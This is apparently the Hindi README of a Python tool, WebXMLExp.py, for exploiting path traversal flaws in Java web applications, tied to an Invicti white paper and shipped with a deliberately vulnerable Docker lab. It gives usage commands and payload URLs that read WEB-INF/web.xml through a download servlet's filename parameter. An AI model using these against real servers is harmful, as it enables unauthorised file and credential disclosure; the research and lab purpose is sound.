
जावा वेब अनुप्रयोगों में पाथ ट्रैवर्सल भेद्यताओं के शोषण में सहायता करने के लिए उपकरण
जावा वेब अनुप्रयोगों में पाथ ट्रैवर्सल कमजोरियों के शोषण में सहायता के लिए उपकरण।
यह उपकरण Invicti Security श्वेतपत्र जावा वेब अनुप्रयोगों में पाथ ट्रैवर्सल कमजोरियों का शोषण में संदर्भित है।
इस उपकरण के लिए Python3 आवश्यक है।
निम्न कमांड चलाएँ:
pip install -r requirements.txt
स्थापना के बाद एक एक्सप्लॉइट URL इस प्रकार दें:
usage: python WebXMLExp.py <url_with_web_xml_exploit_or_inject_here_marker>
परिणाम (डाउनलोड की गई फ़ाइलें) results फ़ोल्डर में उपलब्ध हैं।
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml"
python WebXMLExp.py "http://127.0.0.1:8082/vulnerable/download.servlet?filename=<INJECT-HERE>"
पाथ ट्रैवर्सल भेद्यता के प्रति संवेदनशील एक वेब अनुप्रयोग docker फ़ोल्डर में प्रदान किया गया है।
प्रारंभ करने के लिए, docker फ़ोल्डर में प्रवेश करें और चलाएँ:
docker-compose up
एप्लिकेशन http://127.0.0.1:8082/vulnerable/ पर उपलब्ध है।
पाथ ट्रैवर्सल भेद्यता का शोषण करने के लिए यहाँ जाएँ: http://127.0.0.1:8082/vulnerable/download.servlet?filename=WEB-INF/web.xml